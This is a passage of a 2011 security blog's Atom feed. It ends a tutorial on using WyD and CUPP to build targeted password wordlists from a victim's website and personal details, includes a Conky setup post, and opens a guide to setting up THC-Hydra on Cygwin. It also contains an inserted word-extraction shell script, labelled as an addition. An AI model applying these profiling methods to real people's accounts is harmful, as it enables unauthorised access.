to disable the removal of non-alpha characters from the end of a word, which can be helpful sometimes as the default behavior of WyD is to remove them.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0pt 31.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&amp;lt;filename&amp;gt; OR /path/to/directory/ = this defines where WyD will work its magic&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-4p--CmvUXYY/Tfw5eTKCZlI/AAAAAAAAAAY/VUpoJP1ej0o/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" i$="true" src="http://1.bp.blogspot.com/-4p--CmvUXYY/Tfw5eTKCZlI/AAAAAAAAAAY/VUpoJP1ej0o/s400/4.png" width="333" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;ERRORS: If you experience any errors due to missing perl modules:&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;Ignore them and WyD will still run, but it will run without any modules that had errors. 
Not the end of the world, but not the best we can do either.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;Install the missing Perl modules named in the errors (the error text gives the module name and usually the site it comes from); on most systems "cpan Module::Name" will fetch and build one.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0pt 76.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;If you want to look a module up on the web, this is the place to check details on any Perl package, with links to other helpful info: &lt;a href="http://search.cpan.org/"&gt;http://search.cpan.org/&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0pt 76.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;br /&gt;
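To make concrete what WyD is doing to the mirrored site, and what the -b and -e switches above change, here is an added example written for this write-up (not part of the original post and not wyd.pl's code): a minimal sh and awk stand-in that reads html or plain-text documents on stdin, drops tags and entities, splits on whitespace and prints the unique words most frequent first. Without an argument it strips non-alphanumerics from both ends of each word, which is WyD's default; with the argument keep it leaves them in place, which is what running wyd.pl with -b -e does. The MIN_LEN cut-off and the sample_site content are assumptions constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post and not wyd.pl's code): a
# minimal stand-in for what WyD does with html and plain-text files, in
# sh + awk so it runs on a mirrored site without any Perl modules. It
# reads documents on stdin, drops HTML tags and entities, splits on
# whitespace and prints unique words, most frequent first.
#   profile_words        strips non-alphanumerics from both ends of a
#                        word (WyD's default behaviour)
#   profile_words keep   keeps them (what the post's -b -e switches do)
# MIN_LEN is an assumption for this example, not a WyD setting.

MIN_LEN=3

profile_words() {
    awk -v mode="${1:-strip}" -v minlen="$MIN_LEN" '
    {
        # \074 and \076 are the angle brackets: drop anything tag-shaped
        gsub("\074[^\076]*\076", " ")
        # \046 is the ampersand: drop HTML entities such as nbsp or amp
        gsub("\046[a-zA-Z#0-9]+;", " ")
        n = split($0, tok)
        for (i = 1; i != n + 1; i++) {
            w = tok[i]
            if (mode != "keep") {
                sub(/^[^A-Za-z0-9]+/, "", w)
                sub(/[^A-Za-z0-9]+$/, "", w)
            }
            # substr(w, minlen) is empty exactly when w is shorter than minlen
            if (substr(w, minlen) != "") print w
        }
    }' | sort |  uniq -c | sort -k1,1rn -k2,2 | awk '{ print $2 }'
}

# sample_site: constructed stand-in for a mirrored site (an html page and
# a text file concatenated); octal 074 and 076 are the tag brackets
sample_site() {
    lt=$(printf '\074'); gt=$(printf '\076')
    printf '%s\n' \
        "${lt}html${gt}${lt}title${gt}Acme Widgets${lt}/title${gt}" \
        "${lt}p${gt}Welcome to Acme! Contact SkyWalker (skywalker@acme.example) or call the Acme helpdesk.${lt}/p${gt}" \
        "${lt}/html${gt}" \
        "Acme staff picnic 2011 - photos by SkyWalker."
}

# Usage on a real mirror made with wget -r:
#   find victim-site/ -type f -exec cat {} + | profile_words keep
```

On the constructed sample the strip mode ranks Acme first and turns "Acme!" into Acme, while keep mode preserves "Acme!" and "(skywalker@acme.example)" as their own candidates, which is the trade-off the post's -b -e choice makes: more noise, but no lost punctuation.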
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;That sums up Wyd, so now I will show you how we can make use of our findings from WyD with the help of CUPP to take things a step further and increase our chances even further for our dictionary attack.&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;======================================================================&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;++++++++++CUPP - Common User Passwords Profiler TUTORIAL+++++++++++++++++&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;======================================================================&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
CUPP stands for Common User Passwords Profiler; it is a great tool to add to any security tester's collection and pairs well with the WyD tool covered above. It is a Python tool that can be used for password profiling: building targeted dictionaries, or wordlists, that strengthen your dictionary attacks. &lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;A weak password might be very short or use only alphanumeric characters, which makes cracking it simple because it will show up in almost any of the common wordlists a quick Google search turns up. Another kind of weak password is one that can be easily guessed: pets' names, family members, girlfriends/boyfriends, birthdays and other important dates or events, or the things people obsess about, like God, sex, love and money. You will find many of these in the common wordlists too, but building a smaller, targeted list can save you a lot of time. CUPP generates that list for you based on what Social-Engineer [dot] Org calls "predicting specific target passwords by exploiting human vulnerabilities". 
You will need to download the file from here:&amp;nbsp;&lt;a href="http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Common_User_Passwords_Profiler_(CUPP)"&gt;http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Common_User_Passwords_Profiler_(CUPP)&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;You can extract it using the usual commands (note the option is a plain hyphen, -h; a typographic dash will not be recognised):&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: tar -xvf cupp2.tar.tar&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: python cupp.py -h&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-QDxrDz4ENX8/Tfw5-zPAzNI/AAAAAAAAAAc/l5BHrSloIQc/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" i$="true" src="http://1.bp.blogspot.com/-QDxrDz4ENX8/Tfw5-zPAzNI/AAAAAAAAAAc/l5BHrSloIQc/s400/5.png" width="328" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;There are two ways to use this tool: the interactive menu, or parsing the results from WyD (covered above). I will start with parsing WyD results and then cover interactive mode. &lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;OK, assuming you have already run WyD as discussed above, you can use CUPP to parse its results and work its magic. 
In order to do this you will need to use the following syntax at the console:&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: python cupp.py -w /path/to/file/&amp;lt;filename-from-WyD-output&amp;gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;To check how many words were created:&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: wc -l output-wordlist.txt&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;In order to bring up interactive mode you will simply start the CUPP tool and use the "-i" argument to prompt for interactive mode ("python cupp.py -i"). The tool will ask you a series of questions about your victim, and then use that information to help create a targeted wordlist you can use. When it is done asking you the basic questions you will also have a chance to choose any "extras", like having it also add special characters to the end of the words it creates. It can also add numbers to the end as well as performing an l337 permutation. Once it is done it will create a text file in the CUPP folder labeled by your answer to the first interactive question.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-oORx6ZiuBjs/Tfw6Te_QlvI/AAAAAAAAAAg/q4puPErrP7A/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" i$="true" src="http://4.bp.blogspot.com/-oORx6ZiuBjs/Tfw6Te_QlvI/AAAAAAAAAAg/q4puPErrP7A/s400/6.png" width="378" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;This wraps up my tutorial/overview of few helpful password profiling tools which will certainly aid in creating custom wordlists to facilitate faster dictionary attacks and with higher success rates. I have also included a video of everything below for those of you who enjoy visual learning. I hope you have enjoyed things this week and please stay tuned for more to come in the future, and remember to ensure you have a strong password for all your safe keepings. If you have any questions or suggestions on anything covered today please leave a comment and let me know or shoot me an email or PM. Until next time...&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;Thanks,&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;H.R.&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;PS – I originally did the write up for installing and running things on Cygwin, but then I shot the video using it on Linux. It works either way, although there are less problems and full functionality of all tools in Linux. Here is the VIDEO for those that are interested: &lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://0.gvt0.com/vi/4BPiZOod0_Q/0.jpg" height="266" width="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/4BPiZOod0_Q&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/4BPiZOod0_Q&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/R5nH2GuiZ1Dtc69Pz6myWBsO40Y/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/R5nH2GuiZ1Dtc69Pz6myWBsO40Y/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/R5nH2GuiZ1Dtc69Pz6myWBsO40Y/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/R5nH2GuiZ1Dtc69Pz6myWBsO40Y/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/CWtAZ/~4/UTW0jNvc-xE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/3096852540218767945/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/06/wordlists-password-profiling-with.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/3096852540218767945?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/3096852540218767945?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/UTW0jNvc-xE/wordlists-password-profiling-with.html" title="Wordlists &amp; Password Profiling with CRUNCH, WyD, &amp; CUPP" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-qw730ERe_zo/Tfw4eqa8NbI/AAAAAAAAAAM/layA4LcC5FI/s72-c/1.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/06/wordlists-password-profiling-with.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Dk4NQn05eyp7ImA9WhZbFEs.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-797725610846235234</id><published>2011-06-19T01:29:00.000-05:00</published><updated>2011-06-19T01:29:53.323-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-19T01:29:53.323-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" 
term="Linux System Monitor" /><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><category scheme="http://www.blogger.com/atom/ns#" term="CONKY" /><category scheme="http://www.blogger.com/atom/ns#" term="conky.conf" /><category scheme="http://www.blogger.com/atom/ns#" term="How to install Conky" /><category scheme="http://www.blogger.com/atom/ns#" term="Backtrack 5" /><title>How to Install CONKY on Backtrack 5</title><content type="html">Today I will show you how to install Conky on Backtrack 5 (with my first video release) and will share my configuration file so you can get started easily. This is a very cool tool that allows you to hook into the Linux API and create your own custom system monitor - one that looks super cool too! I will start from the beginning, walk you through the basic steps, and use my preconfigured conf file to show what the final product can look like. I will leave it to you to investigate further and tweak it to fit your needs; it is fully customizable, so you will have fun. If it gets too messy, just remove the configuration file and start over. &lt;br /&gt;
&lt;br /&gt;
Here is the video:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://1.gvt0.com/vi/NQFwqtg3g70/0.jpg"&gt;&lt;param name="movie" value="http://www.youtube.com/v/NQFwqtg3g70&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/NQFwqtg3g70&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;Steps to follow at home:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; apt-get install conky&lt;br /&gt;
&lt;br /&gt;
NOTE: You may need "sudo" in front if you are not on Backtrack&lt;br /&gt;
&lt;br /&gt;
Now you will need to go into "/etc/conky/conky.conf" to make the necessary edits to define what we want to monitor and how we want it all to look. Here are the steps:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; cd /etc/conky&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; gedit conky.conf&lt;br /&gt;
&lt;br /&gt;
Customize as you would like, but here is what mine looks like after lots of time on Google and reading through the Conky docs. You should be fine with this setup, and if you are at all familiar with Linux you should be able to edit the conky.conf details (default or below) to your liking by simply changing interface names, colors, etc. Hope you have enjoyed, and stay tuned for more video series to come in the near future. &lt;br /&gt;
&lt;br /&gt;
Laters, H.R&lt;br /&gt;
&lt;br /&gt;
PS - Here is what the content of my conky.conf file looks like (just copy and paste the below over the existing content and save):&lt;br /&gt;
##################################################################&lt;br /&gt;
# Conky, a system monitor, based on torsmo&lt;br /&gt;
#&lt;br /&gt;
# Any original torsmo code is licensed under the BSD license&lt;br /&gt;
#&lt;br /&gt;
# All code written since the fork of torsmo is licensed under the GPL&lt;br /&gt;
#&lt;br /&gt;
# Please see COPYING for details&lt;br /&gt;
#&lt;br /&gt;
# Copyright (c) 2004, Hannu Saransaari and Lauri Hakkarainen&lt;br /&gt;
# Copyright (c) 2005-2010 Brenden Matthews, Philip Kovacs, et. al. (see AUTHORS)&lt;br /&gt;
# All rights reserved.&lt;br /&gt;
#&lt;br /&gt;
# This program is free software: you can redistribute it and/or modify&lt;br /&gt;
# it under the terms of the GNU General Public License as published by&lt;br /&gt;
# the Free Software Foundation, either version 3 of the License, or&lt;br /&gt;
# (at your option) any later version.&lt;br /&gt;
#&lt;br /&gt;
# This program is distributed in the hope that it will be useful,&lt;br /&gt;
# but WITHOUT ANY WARRANTY; without even the implied warranty of&lt;br /&gt;
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.&amp;nbsp; See the&lt;br /&gt;
# GNU General Public License for more details.&lt;br /&gt;
# You should have received a copy of the GNU General Public License&lt;br /&gt;
# along with this program.&amp;nbsp; If not, see &amp;lt;&lt;a href="http://www.gnu.org/licenses/"&gt;http://www.gnu.org/licenses/&lt;/a&gt;&amp;gt;.&lt;br /&gt;
#&lt;br /&gt;
alignment bottom_left&lt;br /&gt;
background no&lt;br /&gt;
border_width 1&lt;br /&gt;
cpu_avg_samples 2&lt;br /&gt;
default_color red&lt;br /&gt;
default_outline_color red&lt;br /&gt;
default_shade_color red&lt;br /&gt;
draw_borders no&lt;br /&gt;
draw_graph_borders yes&lt;br /&gt;
draw_outline no&lt;br /&gt;
draw_shades no&lt;br /&gt;
use_xft yes&lt;br /&gt;
xftfont DejaVu Sans Mono:size=12&lt;br /&gt;
gap_x 5&lt;br /&gt;
gap_y 60&lt;br /&gt;
minimum_size 5 5&lt;br /&gt;
net_avg_samples 2&lt;br /&gt;
no_buffers yes&lt;br /&gt;
out_to_console no&lt;br /&gt;
out_to_stderr no&lt;br /&gt;
extra_newline no&lt;br /&gt;
own_window yes&lt;br /&gt;
own_window_class Conky&lt;br /&gt;
own_window_type desktop&lt;br /&gt;
stippled_borders 0&lt;br /&gt;
update_interval 1.0&lt;br /&gt;
uppercase no&lt;br /&gt;
use_spacer none&lt;br /&gt;
show_graph_scale no&lt;br /&gt;
show_graph_range no&lt;br /&gt;
# NOTE: the wireless_* names (wireless_essid, wireless_link_qual_perc, ...) are&lt;br /&gt;
# TEXT-section variables, not config settings; conky reports them as config file&lt;br /&gt;
# errors and ignores them here. The TEXT section below reads them per interface&lt;br /&gt;
# (wlan0 and mon0), so nothing needs to be declared in this section.&lt;br /&gt;
TEXT&lt;br /&gt;
${scroll 16 $nodename - $sysname $kernel on $machine | }&lt;br /&gt;
$hr&lt;br /&gt;
${color grey}Uptime:$color $uptime&lt;br /&gt;
${color grey}Frequency (in MHz):$color $freq&lt;br /&gt;
${color grey}Frequency (in GHz):$color $freq_g&lt;br /&gt;
${color grey}RAM Usage:$color $mem/$memmax - $memperc% ${membar 4}&lt;br /&gt;
${color grey}Swap Usage:$color $swap/$swapmax - $swapperc% ${swapbar 4}&lt;br /&gt;
${color grey}CPU Usage:$color $cpu% ${cpubar 4}&lt;br /&gt;
${color grey}Processes:$color $processes&amp;nbsp; ${color grey}Running:$color $running_processes&lt;br /&gt;
$hr&lt;br /&gt;
${color grey}File systems:&lt;br /&gt;
&amp;nbsp;/ $color${fs_used /}/${fs_size /} ${fs_bar 6 /}&lt;br /&gt;
${color grey}Networking:&lt;br /&gt;
Up:$color ${upspeed eth0} ${color grey} - Down:$color ${downspeed eth0}&lt;br /&gt;
$hr&lt;br /&gt;
${color grey}Name&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PID&amp;nbsp;&amp;nbsp; CPU%&amp;nbsp;&amp;nbsp; MEM%&lt;br /&gt;
${color lightgrey} ${top name 1} ${top pid 1} ${top cpu 1} ${top mem 1}&lt;br /&gt;
${color lightgrey} ${top name 2} ${top pid 2} ${top cpu 2} ${top mem 2}&lt;br /&gt;
${color lightgrey} ${top name 3} ${top pid 3} ${top cpu 3} ${top mem 3}&lt;br /&gt;
${color lightgrey} ${top name 4} ${top pid 4} ${top cpu 4} ${top mem 4}&lt;br /&gt;
${color grey}$hr&lt;br /&gt;
SYSTEM ${hr 2}&lt;br /&gt;
${color grey}Nodename:$color $nodename&lt;br /&gt;
${color grey}Current Time:$color $time&lt;br /&gt;
${color grey}Uptime:$color $uptime_short&lt;br /&gt;
${color grey}Kernel Version:$color $kernel&lt;br /&gt;
${color grey}$hr&lt;br /&gt;
CPU ${hr 2}&lt;br /&gt;
${color grey}CPU:$color $freq_g GHz&lt;br /&gt;
${color grey}CPU temp:$color $acpitemp C&lt;br /&gt;
${color grey}CPU use:$color $cpu % $alignc${cpubar 8}&lt;br /&gt;
${color grey}Processes:$color $running_processes/$processes&lt;br /&gt;
${color grey}$hr&lt;br /&gt;
MEMORY ${hr 2}&lt;br /&gt;
${color grey}Memory usage: $mem/$memmax&lt;br /&gt;
$color $memperc % $alignc${membar 8}&lt;br /&gt;
${color grey}$hr&lt;br /&gt;
WIRELESS ${hr 2}&lt;br /&gt;
${color grey}IP:$color ${addr wlan0}&lt;br /&gt;
${color grey}Signal:$color ${wireless_link_qual_perc wlan0}&lt;br /&gt;
${color grey}Down:$color ${downspeed wlan0} Kb/s ${alignr}Up: ${upspeed wlan0} Kb/s&lt;br /&gt;
${downspeedgraph wlan0 15,50 ffffff ffffff} ${alignr}${upspeedgraph wlan0 15,50 ffffff ffffff}$color&lt;br /&gt;
Total: ${totaldown wlan0} ${alignr}Total: ${totalup wlan0}&lt;br /&gt;
${color grey}$hr&lt;br /&gt;
MON0 ${hr 2}&lt;br /&gt;
${color grey}IP:$color ${addr mon0}&lt;br /&gt;
${color grey}Signal:$color ${wireless_link_qual_perc mon0}&lt;br /&gt;
${color grey}Down:$color ${downspeed mon0} Kb/s ${alignr}Up: ${upspeed mon0} Kb/s&lt;br /&gt;
${downspeedgraph mon0 15,50 ffffff ffffff} ${alignr}${upspeedgraph mon0 15,50 ffffff ffffff}$color&lt;br /&gt;
Total: ${totaldown mon0} ${alignr}Total: ${totalup mon0}</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/797725610846235234/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/06/how-to-install-conky-on-backtrack-5.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/797725610846235234?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/797725610846235234?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/3mZxxODOuHQ/how-to-install-conky-on-backtrack-5.html" title="How to Install CONKY on Backtrack 5" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/06/how-to-install-conky-on-backtrack-5.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkcCQ3g-fyp7ImA9WhZbFUw.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-712616321620587648</id><published>2011-06-09T13:57:00.002-05:00</published><updated>2011-06-19T15:07:42.657-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-19T15:07:42.657-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="HYDRA" /><category scheme="http://www.blogger.com/atom/ns#" term="Remote Password Cracking" /><category scheme="http://www.blogger.com/atom/ns#" term="Bruteforce" /><category 
scheme="http://www.blogger.com/atom/ns#" term="Passwords" /><category scheme="http://www.blogger.com/atom/ns#" term="Network Cracking" /><category scheme="http://www.blogger.com/atom/ns#" term="THCHYDRA" /><category scheme="http://www.blogger.com/atom/ns#" term="XHYDRA" /><category scheme="http://www.blogger.com/atom/ns#" term="GPU Cracking" /><category scheme="http://www.blogger.com/atom/ns#" term="CYGWIN" /><category scheme="http://www.blogger.com/atom/ns#" term="Parallel Protocol Attacks" /><title>How to Setup WORKING THCHydra and Cygwin Environment on Windows 7</title><content type="html">&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;strong&gt;UPDATED: Now includes video for getting XHYDRA working on Backtrack 5 at the bottom!&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Calibri;"&gt;Today I will show you how to setup the parallel threaded multi-protocol cracker known as THCHydra to work under a Windows 7 environment. In order to pull this off properly we will need to setup a Cygwin environment on our Windows machine, as there is NO supported .EXE file for Windows to make this magically work (probably a virus if you find one or it is very outdated). Cygwin is like a Linux emulator for Windows, in that it creates a Linux API environment within your windows environment to provide a lot of Linux API functionality (not 100% but close). This is done through the cywin1.dll which allows you to run many programs not originally designed for Windows (i.e. Linux programs like THChydra). The catch is that you can't just run any Linux program you want; you have to build or compile everything you will want to use from source to get it to work in Cygwin environment properly (and even then it is not guaranteed it will work if it was never designed for Windows/Cygwin). 
OK with that out of the way, we can begin...&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;What you need:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Latest version of Cygwin, available here: &lt;/span&gt;&lt;a href="http://cygwin.com/setup.exe"&gt;&lt;span style="font-family: Calibri;"&gt;http://cygwin.com/setup.exe&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; 